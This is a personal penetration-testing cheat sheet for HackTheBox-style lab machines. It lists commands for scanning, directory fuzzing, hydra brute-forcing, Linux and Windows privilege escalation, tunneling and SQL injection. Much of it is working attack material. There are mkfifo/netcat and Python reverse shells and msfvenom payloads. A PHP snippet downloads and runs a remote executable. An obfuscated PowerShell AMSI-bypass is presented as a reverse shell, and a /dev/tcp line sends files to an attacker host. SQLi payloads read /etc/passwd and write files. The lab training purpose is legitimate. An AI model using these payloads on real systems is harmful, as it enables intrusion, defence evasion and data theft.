Cheat Sheet
Some of the commands/tools I often use when doing machines on HTB and similar platforms
Table of Contents
Scan
Enumeration
Bruteforce
Linux Privilege Escalation
Utilities
Reverse Shells
Services
Tools
Wordlists
Miscellaneous
Tunneling
Web Exploitation
Windows Enumeration and Privilege Escalation
Scan
NMAP
sudo nmap -p- -sV -sC -oA nmap.out $IP --min-rate=5000nmap -sV -sC $IP -oN basic_scan.nmapScan a specific port(s) (e.g. port 22 and 80)
nmap -sC -sV -p22,80 -Pn -oN nmap $IPsudo nmap -p22,80 -sV -sC -A -oN scan/open-tcp-ports.txt -sT $ipRustscan
sudo rustscan -u 6500 -b 3000 -a $IP -sC -sV -oN scan.txtEnumeration
Directory Fuzzing
Gobuster
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u <URL>gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt -o output.txtgobuster dir -e -t50 -q -x php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <URL>gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -u <URL> -o gobuster.outFFUF
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u <URL>/FUZZFeroxbuster
feroxbuster -u <URL> --force-recusrion -C 404 -m GET,POST Fuzzing subdomains
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL>ffuf -c -ac -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -H "Host: FUZZ.DOMAIN" -u <URL>ffuf -u <URL>/FUZZ -X POST -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc all -fs 50filter by size
ffuf -w /usr/share/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.DOMAIN" -u <URL> -fs {size}Bruteforce
Login Bruteforce
Hydra bruteforce login
hydra -l $user -P /usr/share/wordlists/rockyou.txt -f $IP http-get /adminhydra -t 1 -V -f -l $user -P /usr/share/wordlists/rockyou.txt $ip smbhydra -l $user -P list.txt $ip ftphydra -l admin -P /usr/share/wordlists/rockyou.txt <URL> http-post-form "/admin/:user=admin&pass=^PASS^:Username or password invalid"Bruteforce pop3 creds
hydra -L usernames_list.txt -P passwords_list.txt pop3://<ip>Bruteforce wp-login using hydra and wpscan
hydra -L usernames_list.txt -P $password <ip> -V http-form-post '/wp-login:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username'hydra -l <username> -P <passwords.txt> <ip> -V http-form-post "/wp-login:log=^USER^&pwd=^PASS^:The password you entered for the username" -t 30wpscan -v -U $wordlist -P $wordlist --url <URL/wp-login.php>username bruteforce using FFUF
ffuf -w /usr/share/wordlists/seclists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u <URL> -mr "username already exists"bruteforce VNC using hydra
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<ip>Bruteforce Procs
for i in $(seq 900 1000); do curl $IP:<port>/?page=../../../../proc/$i/cmdline -o -; echo "PID => $i"; doneBruteforce OTP code
ffuf -c -u '<http://<ip>:<port>/otp-auth>' -H 'Content-Type: application/json' -X POST -d '{"otp":"FUZZ"}' -fr '{"success": "false"}' -w digits.txt -od outputwhere digits.txt is a file with all 4-digit pins and output is an empty dir
Linux Privilege Escalation
Crons
cat /etc/crontabgetcap
getcap -r / 2>/dev/nulldoas
doas -u root /bin/bashFind Running services
netstat -antnetstat -tulpennetstat -an -p tcpss -tlpPython debugger
import pdb—> we can execute any code in the debugger
PATH Hijacking
echo '/bin/bash' > systemctl
chmod +x systemctl
export PATH=.:$PATHUtilities
Random Commands
mtu speed
sudo ifconfig tun0 mtu 1200send a file from victim machine to attacker machine
on the victim machine
cat $file > /dev/tcp/<attacker ip>/<port>on the attacker machine
nc -nlvp <port> > filenameFind Command
Listing files owned by a group
find / -type f -group users 2>/dev/nullSearch for SUID files
find / -user root -perm -4000 -print 2>/dev/nullJohnTheRipper
Rules file
/etc/john/john.confexample rule
[List.Rules:$name]
Az"[0-9][0-9]"ASC / GPG Keys
gpg --import private.keygpg --decrypt fragment.ascReverse Shells
mkfifo
rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IP $PORT >/tmp/fpython
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'Pentester-monkey
https://github.com/pentestmonkey/php-reverse-shell
High On coffee
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Payloadallthings
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
XCT shell
<?php
$data = file_get_contents('<http://10.10.14.20:8000/xc.exe>');
file_put_contents('C:\\\\programdata\\\\xc_10.10.14.20_9001.exe' . $data);
system("C:\\\\programdata\\\\xc_10.10.14.20_9001.exe");
?>./xc -l -p 9001shellcat (my tool)
https://github.com/seriotonctf/shellcat
Obfuscated PowerShell reverse shell
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )SharpEvader
https://github.com/Xyan1d3/SharpEvader
python3 sharpevader.py -p windows/x64/meterpreter/reverse_tcp -lh tun0 -lp 9001msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx -o exploit.aspxmsfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -b "\x00\x25\x26" -f python -v shellcodeServices
SMB
List shares
smbclient -L //<IP>Connect to a share
smbclient //$IP/$sharesmbclient -U $user \\\\$ip\\$sharedownload a full folder from smb
smb: \\> recurse ON
smb: \\> prompt OFF
smb: \\> mget *copy a file over an smb server
run on attacker machine
smbserver.py share . -smb2supportrun on target machine
copy <filename> \\\\<IP>\\share\\FTP
connect to ftp via url
<ftp://$user:$password@$domain> or $ip
example:
?u=ftp://user:[email protected]move to the ftp local directory from ftp
lcd ftpSSH
Get a file from SSH server
scp -P22 user@IP:filename .Send file via ssh
scp $filename $user@$IP:.SCP a folder to your local machine
scp -r $user@$IP:/var/www/html .Hydra username/password bruteforce
hydra -l <username> -P /usr/share/wordlists/rockyou.txt ssh://$IPhydra -l <username> -P <wordlist> $IP -t 4 sshTricks to connect to SSH
grab your SSH key and add it to the authorized_keys file inside the .ssh folder in the target machine
ssh-keygen -f mykeySSH Tunneling
ssh <USER>@<IP> -L <LOCAL PORT>:127.0.0.1:<LOCAL PORT>RDP
xfreerdp /u:$user /d:WORKGROUP /p:$pass /v:$ipWordPress
wpscan --api-token '$your_token_here' --url $URL -U $user -P $password [ or password list ] wpscan --url $URL -e ap,uMySQL
Non-Interactive command
mysql -u $user -p '$pass' -D $database -e '$command;'SNMP
snmpwalk -v 2c -c public $IPcommon vuln
get telnet password using snmp
snmpget -v 1 -c public <IP> .1.3.6.1.4.1.11.2.3.9.1.1.13.0Ref : http://www.irongeek.com/i.php?page=security/networkprinterhacking
Docker
docker pull [image name]docker run [image name]docker inspect [image name]run docker interactive
docker run -it [image]check image history
docker history [image]docker history --no-trunc [image]save layers
docker save [image] -o layers.tarextract docker layers
https://github.com/micahyoung/docker-layer-extract
Git
To see previous commits
git showGet most recent commits -1
git diff HEAD~1NFS
sudo mount -t nfs <IP>: ./tmpRedis
redis-cli -h <IP> -a '$secret'list keys
KEYS *retrieve a range of elements from a list stored at a specific key
LRANGE authlist 1 100MongoDB
start mongo
mongoshow the databases
show dbsshow tables inside the database
show tablesfind content of a table
db.$table_name.find()VNC
Bruteforce login using hydra and msfconsole
hydra
hydra -s 5900 -P /usr/share/wordlists/rockyou.txt vnc://<IP>Using Metasploit
msf6 > use auxiliary/scanner/vnc/vnc_login
msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts <rhost>
msf6 auxiliary(scanner/vnc/vnc_login) > set pass_file /usr/share/wordlists/rockyou.txt
msf6 auxiliary(scanner/vnc/vnc_login) > runReference: https://www.hackingarticles.in/password-crackingvnc/
Interact with VNC
vncviewer <IP>rsync
list files
rsync -av --list-only rsync://<IP>/<sharename> dump files
rsync -av rsync://<IP>/<sharename> <destnation folder>write a file to specific location
rsync <filename> rsync://sys-internal@<IP>/files/sys-internal/.sshTools
Enumeration Tools
lse.sh: https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
linpeas.sh: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
winpeas.exe: https://github.com/carlospolop/PEASS-ng/releases/tag/20230808-5e84dec0
pspy64: https://github.com/DominicBreuker/pspy/releases
searchsploit
searchsploit -m php/webapps/49876.py [module name]gMSADumper
https://github.com/micahvandeusen/gMSADumper
sucrack:
https://github.com/hemp3l/sucrack
Compiled Binaries
https://github.com/Flangvik/SharpCollection
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Wordlists
Seclists
seclists : https://github.com/danielmiessler/SecLists
rockyou.txt
Make a wordlists out of a website
cewl -w wordlists.cewl $website -d 3Make lower/upper case wordlist
cat wordlist.cewl | tr '[:upper:]' '[:lower:]' >> wordlists.cewlSort a wordlist
cat wordlists.cewl | sort -u > sorted.lstMiscellaneous
TTY Shell Upgrade
Spawn a tty shell
python2 -c 'import pty;pty.spawn("/bin/bash")'script /dev/null -c bashpython3 -c 'import pty;pty.spawn("/bin/bash")'export TERM=xtermCtrl + Zstty raw -echo; fgstty rows <rows> columns <cols>Tunneling
Chisel
https://github.com/jpillora/chisel
https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
Used here : https://0xdf.gitlab.io/2022/05/03/htb-antique.html
python3 -m http.servercd /tmp
wget $ip/chisel_1.7.7_linux_amd64
chmod +x chiselI’ll run the binary in server mode on my box:
./chisel_1.7.7_linux_amd64 server -p <port> --reverseNow I’ll connect with chisel from the container:
./chisel_1.7.7_linux_amd64 client $my_ip:<port> R:<port to forward>:<target ip>:<port to forward>Example
forwarding port 5985 from the docker container
my machine
./chisel server -p 5000 --reversetarget machine
./chisel client <tun0 ip>:<port> R:<port to forward>:<target ip>:<port to forward>forward 2 ports at the same time
.\chisel.exe client <ip>:<local port to listen on> R:<first port to forward>:localhost:<first port to forward> R:<second port to forward>:localhost:<second port to forward>Socat
./socat tcp-listen:8001,reuseaddr,fork tcp:localhost:8000Proxy
export http_proxy=127.0.0.1:8080Web Exploitation
SQLi
Union Payloads
' UNION SELECT 1,table_name from information_schema.tables where table_schema='webapp'-- -' UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_schema='webapp' and table_name='queue' -- -write to a file
' UNION SELECT 1,'serioton' INTO OUTFILE '/var/www/html/test.html' -- -read a file
' UNION SELECT 1,load_file('/etc/passwd') -- -Windows Enumeration and Privilege Escalation
The script below looks for Win32 services on the host with unquoted service paths, not in the Windows folder.
Get-WmiObject -Class Win32_Service | Where-Object { $*.PathName -inotmatch “`”” -and $*.PathName -inotmatch “:\\\\Windows\\\\” }| Select Name,Pathnamecheck for user privileges
whoami /privpowershell history file
APPDATA\\roaming\\microsoft\\windows\\powershell`\\psreadline\\ConsoleHost_History.txtcheck for specific user info
net user $usernameGet the LAPS passwords
Get-ADComputer -Filter * -Properties *check if we can connect via winrm
crackmapexec winrm <ip> -u <username> -p <password>login via evil-winrm
evil-winrm -i <ip> -u <username> -p <password>BloodHound
bloodhound python
bloodhound-python -c all -u <username> -p <password> -d <domain> -dc <dc> -ns <ip> --disable-pooling -w1 --dns-timeout 30first start neo4j
sudo neo4j consolethen start bloodhound
bloodhoundLast updated
Was this helpful?